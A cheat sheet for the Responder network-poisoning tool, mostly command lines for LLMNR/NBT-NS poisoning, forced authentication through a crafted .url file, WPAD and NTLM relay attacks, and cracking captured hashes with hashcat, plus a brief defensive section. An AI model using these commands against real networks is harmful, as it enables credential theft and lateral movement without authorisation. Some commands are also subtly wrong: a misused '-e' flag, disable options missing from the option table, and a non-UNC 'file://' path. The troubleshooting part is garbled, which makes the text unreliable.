Responder Cheat Sheet
Overview
Responder is a powerful LLMNR (Link-Local Multicast Name Resolution), NBT-NS (NetBIOS Name Service), and MDNS (Multicast DNS) poisoner. It's designed to respond to specific network name resolution queries and includes built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication servers supporting NTLMv1/NTLMv2/LMv2 authentication.
⚠️ Warning: Responder is a security testing tool that should only be used in environments where you have explicit permission to do so.
Installation
Kali Linux
# Update package list
sudo apt update
# Install if not already installed
sudo apt install responder
From GitHub
# Clone the repository
git clone https://github.com/lgandx/Responder
# Navigate to the directory
cd Responder
# Make the Python script executable
chmod +x Responder.py
Using pip
# Install using pip
pip install Responder
Basic Usage
Starting Responder
# Basic usage with interface specification
responder -I eth0
# Start with all options enabled
responder -I eth0 -wrf
# Analyze mode (passive)
responder -I eth0 -A
Command Line Options
| Option | Description |
|---|---|
-h, --help |
Show help message and exit |
-A, --analyze |
Analyze mode. Do not poison any requests, just analyze traffic |
-I <interface> |
Network interface to use |
-i <IP> |
IP address to bind to |
-e <IP> |
External IP address (for DHCP options) |
-b, --basic |
Return a Basic HTTP authentication. Default: NTLM |
-r, --wredir |
Enable answers for netbios wredir suffix queries |
-d, --NBTNSdomain |
Enable answers for netbios domain suffix queries |
-f, --fingerprint |
Fingerprint hosts that issued an NBT-NS or LLMNR query |
-w, --wpad |
Start the WPAD rogue proxy server |
-u, --upstream-proxy |
Upstream HTTP proxy used by the rogue WPAD proxy |
-F, --ForceWpadAuth |
Force NTLM/Basic authentication on wpad.dat file retrieval |
-P, --ProxyAuth |
Force NTLM/Basic authentication for any proxy request |
-lm, --LM |
Force LM hashing downgrade for Windows XP/2003 and earlier |
-v, --verbose |
Increase verbosity |
--log-local |
Log to file in addition to console |
-s, --disable-syslog |
Do not log to syslog |
-S, --disable-stdout |
Do not log to stdout |
-c, --config |
Path to configuration file |
--server=SERVER |
Enable/disable specific server (HTTP, SMB, etc.) |
--sql |
Enable the MSSQL server |
--mssql |
Enable the MSSQL server |
--https |
Enable the HTTPS server |
--http |
Enable the HTTP server |
--smb |
Enable the SMB server |
--ftp |
Enable the FTP server |
--imap |
Enable the IMAP server |
--pop |
Enable the POP server |
--smtp |
Enable the SMTP server |
--ldap |
Enable the LDAP server |
--dns |
Enable the DNS server |
Configuration File
The configuration file is located at /etc/responder/Responder.conf or in the Responder directory as Responder.conf.
Key Configuration Options
[Responder Core]
; Set to On or Off to enable or disable features
SQL = On
SMB = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = On
HTTPS = On
DNS = On
LDAP = On
Attack Scenarios
Basic LLMNR/NBT-NS Poisoning
# Start Responder with default settings
responder -I eth0 -v
# Wait for authentication attempts
# Hashes will be saved in the logs directory
Forced Authentication via UNC Path
# Create a file with a UNC path
echo "file://<non-existent-share>/test.txt" > malicious.url
# Start Responder
responder -I eth0 -v
# When the victim opens the file, their system will attempt to authenticate
# Responder will capture the hash
WPAD Attack
# Start Responder with WPAD enabled
responder -I eth0 -w -v
# When a victim's browser requests a WPAD configuration file
# Responder will respond and capture authentication attempts
Relay Attack Setup
# Start Responder with SMB and HTTP servers disabled
responder -I eth0 -v --disable-http --disable-smb
# In another terminal, run ntlmrelayx
ntlmrelayx.py -t <target_ip> -smb2support
Hash Capture and Cracking
Viewing Captured Hashes
# View captured hashes
cat /usr/share/responder/logs/SMB-NTLMv2-SSP-<IP>.txt
# Format of captured hash
# USERNAME::DOMAIN:challenge:NTLM response:other data
Cracking with Hashcat
# Crack NTLMv2 hashes with hashcat
hashcat -m 5600 /usr/share/responder/logs/SMB-NTLMv2-SSP-<IP>.txt /path/to/wordlist
# Crack NTLMv1 hashes with hashcat
hashcat -m 5500 /usr/share/responder/logs/SMB-NTLMv1-SSP-<IP>.txt /path/to/wordlist
Advanced Techniques
Using Responder with MultiRelay
# Start Responder with SMB and HTTP servers disabled
responder -I eth0 -v --disable-http --disable-smb
# In another terminal, run MultiRelay
cd Responder/tools
python3 MultiRelay.py -t <target_ip> -u ALL
Poisoning Specific Hosts
# Create a file with target IPs
echo "192.168.1.10" > targets.txt
# Start Responder with target file
responder -I eth0 -v -e targets.txt
Custom Challenge Value
# Edit Responder.conf and set a custom challenge
# [Responder Core]
# Challenge = 1122334455667788
Defensive Measures
Disabling LLMNR via Group Policy
- Open Group Policy Editor
- Navigate to Computer Configuration > Administrative Templates > Network > DNS Client
- Enable "Turn off multicast name resolution"
Disabling NBT-NS via Command Line
# Disable NBT-NS on Windows
netsh interface ipv4 set interface "Local Area Connection" nbtbios=disabled
Disabling NBT-NS via Registry
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\NodeType = 2 (P-node)
Detecting Responder Activity
# Monitor for suspicious LLMNR/NBT-NS responses
# Look for multiple services running on the same IP
# Check for unusual authentication attempts
Troubleshooting
Common Issues
- Port Conflicts ```bash # Check if ports are already in use netstat -tuln|grep -E '445|80|53'
# Kill conflicting processes
sudo kill
- Interface Not Found ```bash # List available interfaces ip a
# Use the correct interface name
responder -I
-
Permission Issues
bash # Run with sudo sudo responder -I eth0 -
No Hashes Captured
bash # Check if Responder is running in analyze mode # Ensure the network allows the required traffic # Try forcing authentication with UNC paths
Resources
This cheat sheet provides a comprehensive reference for using Responder in security testing scenarios. Always ensure you have proper authorization before using this tool in any environment.